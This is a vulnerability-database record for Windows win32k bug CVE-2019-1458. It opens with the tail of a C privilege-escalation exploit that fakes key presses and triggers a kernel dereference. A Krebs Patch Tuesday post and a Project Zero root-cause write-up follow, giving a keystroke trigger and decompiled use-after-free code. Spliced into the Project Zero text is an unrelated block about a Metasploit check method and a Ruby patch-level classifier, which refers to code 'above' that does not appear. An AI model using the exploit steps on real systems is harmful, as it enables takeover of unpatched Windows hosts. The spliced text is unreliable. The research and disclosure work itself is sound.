(PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering 
dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}\n\n# 0day.today [2020-03-09] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34066"}], "krebs": [{"lastseen": "2019-12-14T23:20:57", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0859", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1489"], "description": "**Microsoft** today released updates to plug three dozen security holes in its **Windows** operating system and other software. The patches include fixes for seven critical bugs \u2014 those that can be exploited by malware or miscreants to take control over a Windows system with no help from users -- as well as another flaw in most versions of Windows that is already being exploited in active attacks.\n\nBy nearly all accounts, the chief bugaboo this month is [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>), a vulnerability in a core Windows component (Win32k) that is present in Windows 7 through 10 and Windows Server 2008-2019. This bug is already being exploited in the wild, and according to **Recorded Future** the exploit available for it is similar to [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>), a Windows flaw reported in April that was found [being sold in underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\nCVE-2019-1458 is what's known as a \"privilege escalation\" flaw, meaning an attacker would need to previously have compromised the system using another vulnerability. 
Handy in that respect is [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>), a similarly widespread critical issue in the Windows font library that could be exploited just by getting the user to visit a hacked or malicious Web site.\n\n**Chris Goettl**, director of security at [Ivanti](<https://www.ivanti.com/resources/patch-tuesday>), called attention to a curious patch advisory Microsoft released today for [CVE-2019-1489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>), which is yet another weakness in the **Windows Remote Desktop Protocol** (RDP) client, a component of Windows that lets users view and manage their system from a remote computer. What's curious about this advisory is that it applies only to **Windows XP Service Pack 3**, which is no longer receiving security updates.\n\n\"The Exploitability Assessment for Latest Software Release and Older Software Release is 0, which is usually the value reserved for a vulnerability that is known to be exploited, yet the Exploited value was currently set to 'No' as the bulletin was released today,\" Goettl said. \"If you look at the Zero Day from this month ([CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)) the EA for Older Software Release is '0 - Exploitation Detected.' An odd discrepancy on top of a CVE advisory for an outdated OS. It is very likely this is being exploited in the wild.\"\n\nMicrosoft didn't release a patch for this bug on XP, and [its advisory on it](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>) is about as sparse as they come. But if you're still depending on Windows XP for remote access, you likely have bigger security concerns. Microsoft has patched [many critical RDP flaws](<https://krebsonsecurity.com/?s=rdp+2019+microsoft+patch&x=0&y=0>) in the past year. 
Even [the FBI last year encouraged users to disable it](<https://blog.netop.com/fbi-recommends-rdp-alternative>) unless needed, citing flawed encryption mechanisms in older versions and a lack of access controls which make RDP a frequent entry point for malware and ransomware.\n\nSpeaking of no-longer-supported Microsoft operating systems, **Windows 7** and **Windows Server 2008** will cease receiving security updates after the next decade's first Patch Tuesday comes to pass on January 14, 2020. While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nWindows 10 likes to install patches and sometimes feature updates all in one go and reboot your computer on its own schedule, but you don't have to accept this default setting. _Windows Central_ has [a useful guide](<https://www.windowscentral.com/how-stop-updates-installing-automatically-windows-10>) on how to disable or postpone automatic updates until you're ready to install them. For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not losing your mind when the odd buggy patch causes problems booting the system. 
So do yourself a favor and back up your files before installing any patches.\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may even chime in here with some helpful tips.\n\nFinally, once again there are no security updates for **Adobe Flash Player** this month (there is a non-security update available), but Adobe did release critical updates for Windows and macOS versions of its **Acrobat** and **PDF Reader** that fix more than 20 vulnerabilities in these products. **Photoshop** and **ColdFusion 2018** also received security updates today. Links to advisories [here](<https://blogs.adobe.com/psirt/?p=1813>).", "modified": "2019-12-11T01:51:25", "published": "2019-12-11T01:51:25", "id": "KREBS:537C1540357C1E3360A8168D22F44CB5", "href": "https://krebsonsecurity.com/2019/12/patch-tuesday-december-2019-edition/", "type": "krebs", "title": "Patch Tuesday, December 2019 Edition", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). 
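The cve_2019_1458_wizardopium module's `check` method above decides whether a host "appears" vulnerable by comparing the win32k.sys file version against a table of first-fixed builds, and the Krebs post notes the bug is present in Windows 7 through 10 and Server 2008 through 2019. The script below is an added example, not code from either Metasploit module or from the blog: it reproduces the module's build table as a standalone classifier, using Gem::Version in place of Rex::Version, so the same comparison can be run over versions collected from an inventory. It differs from the module in one deliberate way: a version from a release family the table does not list is reported as unknown rather than safe, because absence from the table says nothing about whether that release carries the fix. The family labels and the unknown outcome are this example's own additions.

```ruby
# Added example, not code from the Metasploit module: the module's
# win32k.sys build table (Qualys December 2019 numbers, as the module cites)
# as a standalone classifier. Gem::Version replaces Rex::Version.
require 'rubygems'

# One row per release family: label, the leading version segments that identify
# the family, and the first win32k.sys build that carries the December 2019 fix
# (nil where the module's table has no fixed build and treats the whole family
# as vulnerable; the module uses a .99999 sentinel for that case).
WIN32K_FIX_TABLE = [
  ['Windows Vista / Server 2008',    [6, 0],          '6.0.6003.20692'],
  ['Windows 7 / Server 2008 R2',     [6, 1],          '6.1.7601.24540'],
  ['Windows 8 / Server 2012',        [6, 2],          '6.2.9200.22932'],
  ['Windows 8.1 / Server 2012 R2',   [6, 3],          '6.3.9600.19574'],
  ['Windows 10 v1507',               [10, 0, 10240],  '10.0.10240.18427'],
  ['Windows 10 v1511',               [10, 0, 10586],  nil],
  ['Windows 10 v1607',               [10, 0, 14393],  '10.0.14393.3383'],
].map { |label, prefix, fixed| [label, prefix, fixed && Gem::Version.new(fixed)] }.freeze

# Classifies a "major.minor.build.revision" string read from win32k.sys.
# Returns [:vulnerable | :patched | :unknown, family label or nil].
# :unknown is this example's choice: the module returns Safe for families it
# does not list, which conflates "not in the table" with "fixed".
def classify_win32k(version_string)
  unless version_string.match?(/\A\d+\.\d+\.\d+\.\d+\z/)
    raise ArgumentError, "expected four dotted numbers, got #{version_string.inspect}"
  end
  version = Gem::Version.new(version_string)
  segments = version.segments
  WIN32K_FIX_TABLE.each do |label, prefix, fixed|
    next unless segments[0, prefix.length] == prefix
    return [:vulnerable, label] if fixed.nil?
    return [version < fixed ? :vulnerable : :patched, label]
  end
  [:unknown, nil]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample versions, not readings from real hosts.
  ['6.1.7601.24540', '6.1.7601.23000', '10.0.14393.3300', '10.0.18362.1'].each do |v|
    state, family = classify_win32k(v)
    puts format('%-18s %-11s %s', v, state, family || '(not in table)')
  end
end
```

On a live host the version string comes from the file's version resource (the module reads it through `file_version`), not from the OS build reported by `winver`, since win32k.sys is serviced independently of the OS build number.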
\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. 
I acknowledge that I have significant experience in reverse engineering; however, I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24-hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. 
This includes the root cause analysis for CVE-2019-1433, which I originally thought was the vulnerability behind the in-the-wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal-to-noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. 
Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\nIt turns out that my assumption that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. 
In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, I needed a little time to wrap my head around the GUI aspects.\n\nOn James Forshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\nNow that I had a copy of the supposedly patched and supposedly vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. 
(Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)

![Original BinDiff Matched Functions of win32k.sys without Symbols](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)

When I started the diff, I didn’t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn’t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren’t running IDA on a Windows computer. So after running the WinDbg command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.

![BinDiff Matched Functions of win32k.sys with Symbols](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)

What stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky’s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn’t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn’t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE.
Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:

 * CreateSurfacePal - [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)

 * RFONTOBJ::bInsertGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ - [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)

## EXPLORING THE WRONG CHANGES

At this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had “bitmap” in the name and Kaspersky’s blog post talked about the use of bitmaps.

The changes to GreGetStringBitmapW didn’t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the BinDiff image above. In the Dec 2019 win32k.sys its offset from the base address is 0x22F200.

![BinDiff for vuln function](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)

As shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 version added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a candidate for the vulnerability: it’s called from a function with bitmap in the name and it appears that there would be a way to overrun a buffer.

I decided to keep reversing and spent a few days on this change.
I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that “bitmap” was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.

![Call graph to vuln_sub](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)

The Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.

Tracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn’t be called when calling the functions listed in the blog post or triggering the task switch window.

I downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working “Hello, World”, I began to add calls to the functions that are mentioned in the Kaspersky blog post: creating the “Switch” window, CreateBitmap, SetBitmapBits, NtUserMessageCall, half-manually/half-programmatically triggering the task-switch window, etc.
I set a kernel breakpoint in WinDbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.

I then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the “highlight” to the different windows each time you press tab. I thought, “Sure, that could involve animating a palette”, but I had learned from last time and started by trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at, so I didn’t spend too long and moved on.

## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent

After these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky’s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.

![Cross-refs to DrawSwitchWndHilite](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)

As shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that led to a call to DrawSwitchWndHilite, so I started reversing to understand the changes.

## REVERSING THE VULNERABILITY

I had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn’t include type information. To begin finding type information, I started googling for different function names or variable names.
While it didn’t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.

For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *); gptiCurrent → global, pointer to thread info (tagTHREADINFO *).

This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it’s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.

At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability.
As a side note, for the reversing, I found that the Hex-Rays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.

## RESOURCES

Here are some of the resources that were critical for me:

 * “Kernel Attacks Through User-Mode Callbacks”, Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]

   * I learned about thread locking, assignment locking, and user-mode callbacks.

 * “One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild” by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]

   * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.

 * “Kernel exploitation – r0 to r3 transitions via KeUserModeCallback” by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]

   * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.

 * “Windows Kernel Reference Count Vulnerabilities - Case Study” by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]

 * “Analyzing local privilege escalations in win32k” by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]

 * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes

# TIMELINE

 * Oct 31 2019: Chrome releases fix for CVE-2019-13720

 * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458
as exploited in the wild and fixed in the December updates.

 * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!

 * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days of work on a different project.)

 * Dec 23 2019: VM is set up. Start patch diffing.

 * Dec 24 - Jan 2: Holiday

 * Jan 2 - Jan 3: Look at other diffs that weren’t the vulnerability. Try to trigger DrawSwitchWndHilite.

 * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow are the correct change. (Note, dear reader, this is not in fact the “correct change”.)

 * Jan 6 - Jan 16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.

 * Jan 16: Crash POC crashes!

Approximately 3 work weeks to set up a test environment, diff patches, and create a crash POC.

# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS

Bug class: use-after-free

## OVERVIEW

The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user-mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow, and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after-free.

## DETAILED WALK THROUGH

This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section.
The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).

### ANALYZED SAMPLES

I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the “My Process” section.

Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)

Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)

### OVERVIEW

This walk through is broken up into the following sections to describe the vulnerability:

 * Triggering xxxNextWindow

 * Freeing the tagQ (queue) structure

 * User-mode callback xxxMoveSwitchWndHilite

 * Using the freed queue

### TRIGGERING xxxNextWindow

The code path is triggered by a special set of keyboard inputs to open a “Sticky Task Switcher” window. As a side note, I didn’t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API:

<ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See the triggerNextWindow function in the POC.)

The “normal” way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for “sticky”. However, this window won’t hit the vulnerable code path, xxxNextWindow. The “normal” task switching window looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the “normal” task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that.
![“Normal” task switch window](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)

![Window that is displayed when xxxNextWindow is called](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)

If this is the first “tab press” then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached.

### FREEING THE QUEUE in xxxNextWindow

xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function.

At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-mode callback is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window.
```c
void __fastcall xxxNextWindow(tagQ *queue, int a2) {
[...]
    v43 = 0;
    while ( 1 ) {
        // gspwndAltTab must be the special system class (low 14 bits of fnid == 0x2A0)
        if ( (gspwndAltTab->fnid & 0x3FFF) == 0x2A0 &&
             gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&
             gspwndAltTab->bDestroyed == 0 )
            v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
        else
            v45 = 0i64;
        if ( !v45 ) {
            ThreadUnlock1();
            goto LABEL_106;
        }
        handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); // ← USER MODE CALLBACK
        if ( v43 ) {
            if ( v43 == handleOfNextWindowToHilite ) {
                v48 = 0i64;
LABEL_103:
                ThreadUnlock1();
                HMAssignmentLock(&gspwndActivate, v48);
                if ( !*(_QWORD *)&gspwndActivate )
                    xxxCancelCoolSwitch();
                return;
            }
        } else {
            v43 = handleOfNextWindowToHilite;
        }
        tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);
        if ( tagWndPtrOfNextWindow )
            goto LABEL_103;
        isShiftPressed2 = isShiftPressed;
    }
[...]
LABEL_106:
    v11 = queue->spwndActive; // ← USE AFTER FREE
